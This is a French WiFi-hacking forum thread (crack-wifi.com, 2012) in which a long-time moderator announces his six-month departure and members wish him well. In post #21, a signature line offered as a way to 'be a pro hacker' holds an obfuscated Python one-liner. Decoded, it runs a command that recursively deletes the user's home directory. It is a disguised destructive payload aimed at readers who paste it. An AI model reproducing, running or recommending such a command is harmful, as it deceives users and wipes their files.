Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-01-2012 11:34:47

antares145
Membre d'honneur
Site Web

Sur le départ...

Salut à tous !

Vous allez peut-être constater un léger changement sur le forum dans les semaines à venir, et je ne parle pas seulement du déménagement en Lituanie... En effet j'ai enfin la chance de concrétiser un vieux projet personnel : je pars pour 6 mois dans un pays très très loin, loin de l'Europe frileuse et ses soi-disants problèmes. Ca sera l'occasion pour moi de changer d'air, me remettre en question, et si possible aider des gens qui en ont vraiment besoin.

La conséquence, c'est que là où je vais les connections Internet sont à peu près aussi rares que l'eau potable, donc je vais me faire beaucoup moins présent sur le forum ; carrément absent en fait... C'est pourquoi je remets officiellement ma démission à M1ck3y en tant que modérateur, je ne veux pas d'une fonction que je ne saurai pas remplir (c'est un principe).

Certains diront que ça va faire un vide, et ils auront probablement raison. Certains diront même que c'est un coup rude pour le forum, à voir... Je ne suis pas assez objectif pour me prononcer. Quoi qu'il en soit, je suis sûr que le forum s'en remettra et qu'il sera encore là quand je reviendrai smile Il a connu plusieurs périodes difficiles et s'est toujours relevé pour finalement devenir une petite référence dans le milieu (ça fait toujours plaisir). Ce n'est pas fait exprès que ça tombe en même temps que la deuxième Grande Migration, serait-ce un signe que 2012 sera une grande année de changements ? wink

Je tenais en tout cas à tous vous remercier pour les 2 ans que j'ai passés sur le forum. Contrairement à ce que vous pouvez penser j'ai énormément appris ici en répondant aux différentes questions. Comme l'a très bien dit quelqu'un ici que je me permets de citer :

Mycomeback31 a écrit :

L'intérêt d'expliquer quelque chose à quelqu'un, c'est que ça permet de clarifier sa pensée. On peut avoir compris quelque chose et avoir pourtant beaucoup de mal à l'expliquer (plus particulièrement pour tout ce qui est sciences, maths...). Donc faire cet exercice aide.

La connaissance s'acquiert par la réflexion, ça demande du temps et de l'investissement mais ça en vaut la peine !

Je voudrais remercier en particulier
- M1ck3y pour sa confiance et sa gestion efficace bien que dans l'ombre, sans qui il n'y aurait tout simplement pas de forum (la preuve en est avec la migration prochaine)
- Noireaude, fidèle sentinelle nocturne, pour son efficacité doublée d'humour, qui met de l'ambiance partout où il passe (la technique sans l'humour n'est rien, sache-le !)
- Koala en tant que modo (bah ouais priorité aux collègues) ainsi que son implication engagée dans certains projets (la Livebox cèdera !)
- Kcdtv (¡ Olé !), Squaks, Fuji, Coyotus, Konik, Yasmine (sinon je vais encore réveiller ses pulsions féministes) et tous ceux que je n'oublie pas, membres historiques et réguliers qui faites en sorte que le forum est ce qu'il est et qu'il garde sa bonne ambiance.

Oui, merci à vous tous pour ce que vous apportez, et qui prouvez que l'esprit de communauté existe encore !
Bonne continuation à tous, à dans quelques mois, et longue vie au forum (en Lituanie ou ailleurs) ! nux

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-01-2012 12:36:01

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Re : Sur le départ...

C'est pas vrai ! 012.gif

Dernière modification par Fuji (10-02-2012 00:25:19)

#3 05-01-2012 12:56:06

konik
Membre d'Or
Lieu : 127.0.0.1

Bonne chance pour ton projet même si tes explications précises et détaillées vont réellement manquer au fofo!
A plus!;)

$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

#4 05-01-2012 15:02:54

koala
Membre d'honneur
Lieu : In the sky

En effet j'ai enfin la chance de concrétiser un vieux projet personnel : je pars pour 6 mois dans un pays très très loin, loin de l'Europe frileuse et ses soi-disants problèmes. Ca sera l'occasion pour moi de changer d'air, me remettre en question, et si possible aider des gens qui en ont vraiment besoin.

C'est bien ça, ayant pas mal voyagé je pense que la réalisation de soi même a travers les rencontres, la découverte des culture locale ne peut etre que bénéfique.Je te souhaite un bon périple a travers le pays dans lequel tu vas aller, j'espère que l'on aura des nouvelles de temps en temps même si c'est rare wink.

Certains diront que ça va faire un vide, et ils auront probablement raison. Certains diront même que c'est un coup rude pour le forum, à voir... Je ne suis pas assez objectif pour me prononcer.

Je pense en effet que tes explications vont manquer car du forum tu as les explications les plus précises et poussé.

Oui, merci à vous tous pour ce que vous apportez, et qui prouvez que l'esprit de communauté existe encore !

Effectivement a nous de montrer que l'on peut bien faire d'une manière communautaire.

Bonne chance a toi ! roll

#5 05-01-2012 15:20:46

maribo
Membre Actif

bonne chance!
ca va manquer c'est sur et certain!

#6 05-01-2012 15:23:33

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

On va perdre l'un des esprits les plus brillants. Je te remercie Antares et te souhaite un agréable voyage wink

Antares145 le Magnifique !

#7 05-01-2012 17:40:30

Squaks
Membre Irremplaçable

Oh le choc ! sad

Tu vas nous manquer.

Fais bon voyage, on t'attend dans 6 mois wink

Sharkoff

#8 05-01-2012 17:44:30

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Bon j'arrive à la bourre (comme d'hab), et je dois dire que j'aurais préféré faire une heure de siète en plus que de lire ça.

Mais d'un autre côté je n'arrive pas à être triste car la fin de quelque chose signifie toujours qu'une autre commence. Je me réjouis avant tout qu'à titre personnel tu ais concrétisé ton projet et que tu t'engages dans quelquechose que tu as envie de faire. Puis six mois ça passe vite.

Je te souhaite une belle aventure et je te dis à bientôt, car je le sais tu reviendras ...

Bon en attendant, tu vas vachement me, nous, manquer quand même :'( ...

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#9 05-01-2012 17:47:43

yasmine
Membre Indispensable

antares145 a écrit :

... Lituanie...

C'est où ca ??? J'arrive et "SI" je n'arriverai pas, eh ben, Bonne Chance et Merci, ..pour ce que tu as fais et ce que tu vas faire !

#10 05-01-2012 17:58:48

noireaude
Membre d'honneur
Site Web

Roh put.. j'suis triste quand même !!!!  pam

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#11 05-01-2012 18:13:57

M1ck3y
Administrateur
Lieu : Lost in the darkness

Il parait que personne n'est indispensable... Bien sur le forum va poursuivre son petit bonhomme de chemin meme en ton absence, mais personne ici ne pourra rivaliser avec tes posts toujours clairs, détaillés, intéressants et intelligibles pour le plus grand nombre. En aidant les autres tu as appris de plus en plus de choses et tu as su faire bon usage de tout ce savoir en le partageant avec les membres du forum qui ont été ravis de croiser ton chemin. Tu vas beaucoup manquer à tout le monde ici, c'est clair...

Bonne route à toi grand sage wink

#12 05-01-2012 21:51:59

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Lorsque j'ai lu le titre et vu que le topic était de toi, je me suis dis: "Quand même pas!..." ou "Oh my god I can't beleive it" ou bien "¡Me cago en la leche!...¡No puede ser!"
Merde! C'est que j'ai encore du mal à me faire à l'idée sad
Besoin d'un p'tit bigsmoke cool
Celui la je le fumes à ta santé Antares, à ton voyage.
Bonne chance, bonne route...
En fait non, je vais te séquestrer et t'enchaîner de force dans la cave de mon immeuble devant un P4 bloqué sur crack-wifi.com...
Pas bonne idée: En dix minutes tu auras piraté la ligne perso de rajoy et envoyé le FBI español chez moi pendant que mon autre PC me donnera des coups de souris parce que tu lui auras logé un virus de ta création...
Ok je m'avoue vaincu...
Prends bien soin de toi et que tout se passe pour le mieux smile
On the road again, Oh yeah!

PS: Je ne t'ai même pas remercié et félicité pour ton - je ne sais pas quel mot choisir, "travail", "action", "rôle" - comme modérateur.
Si tes connaissances peuvent être utiles à d'autres quelques part sur le globe; ils ne pourrons pas trouver meilleur interlocuteur.
Chapeau maestro!

Dernière modification par kcdtv (05-01-2012 22:02:20)

#13 06-01-2012 08:02:11

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

dommage j'aimais bien lire tes réponses, tu va me manquer.

1310812721.gif

#14 06-01-2012 18:03:29

faptiem
Membre Indéboulonnable

Merci pour tout et bon voyage, nous espérons te revoir à l'issue de celui ci wink

#15 06-01-2012 18:59:04

Cahaleen
Membre Radioactif
Lieu : Paris

Bien que peu causant je suis de très près la vie de ce forum et je te souhaite tout l'épanouissement possible dans cette nouvelle fonction! Si l'envie t'en prends, n'hésite pas à nous partager ton voyage par épisodes, ça nous fera un bon feuilleton smile

Merci aussi pour tes explications toujours claires et intéressantes (c'est pour moi une grande marque d'humanité car pour expliquer quelquechose il faut savoir se mettre à la place de l'autre pour comprendre ce qu'il n'a pas compris) et bon voyage!!

#16 07-01-2012 12:36:58

antares145
Membre d'honneur
Site Web

Voilà, c'est le Grand Jour, la déconnexion d'Antares smile Dans quelques heures je m'envole vers d'autres horizons (ensoleillés, c'est déjà ça). J'essayerai de donner quelques nouvelles si j'en ai l'occasion, mais je ne peux rien garantir.

Merci à tous pour vous compliments, vos remerciements, vos encouragements, et toute votre énergie positive. Bonne continuation à tous, et vive le forum ! smile

C'était Antares en direct de l'Europe, je rends l'antenne, à vous les studios.

#17 07-01-2012 13:25:06

koala
Membre d'honneur

Merci à tous pour vous compliments, vos remerciements, vos encouragements, et toute votre énergie positive.

C'est la moindre des choses smile

C'était Antares en direct de l'Europe, je rends l'antenne, à vous les studios

Un volontaire pour prendre le relais? moi je risque de faire chuter l'audience big_smile

#18 07-01-2012 13:54:29

M1ck3y
Administrateur

Je vais de ce pas modifier ton groupe utilisateur puisque tu l'avais demandé. Ca me fait tout drole quand meme... Bon voyage, reviens nous tout bronzé et en pleine forme!

#19 08-01-2012 20:33:21

Jack Sparrow
Membre Indéboulonnable

Un grand merci pour toute l'aide que tu as pu m'apporter pendant ces quelques mois!! J'ai vraiment l'impression que tu connais tout sur tout, j'espère que tu nous reviendras en forme smile  profite bien de ton voyage wink

#20 10-01-2012 01:25:00

Grand Hibou
Membre d'honneur

Salut Antares,

bon séjour à toi chez les lithuaniens!

Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

#21 10-01-2012 09:36:27

spawn
Modérateur

If%2BYou%2BCan%2527t%2BExplain%2BIt%2BSimply%252C%2BYou%2BDon%2527t%2BUnderstand%2BIt%2BWell%2BEnough%2B-%2BAlbert%2BEinstein.jpg

Bonne route !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#22 10-01-2012 10:01:44

noireaude
Membre d'honneur
Site Web

Bon décollage l'ami wink

#23 10-01-2012 18:19:48

M1ck3y
Administrateur

Grand Hibou a écrit :

Salut Antares,

Antares n'a jamais dit qu'il partait en Lituanie je crois que tu as du lire un peu trop vite lol

#24 10-01-2012 18:25:15

noireaude
Membre d'honneur
Site Web

M1ck3y a écrit :
Grand Hibou a écrit :

Salut Antares,

Antares n'a jamais dit qu'il partait en Lituanie je crois que tu as du lire un peu trop vite lol

Je plussoie il a même parlé de soleil !!! smile

#25 10-01-2012 18:37:21

koala
Membre d'honneur

Il va faire bronzette cool

Annonce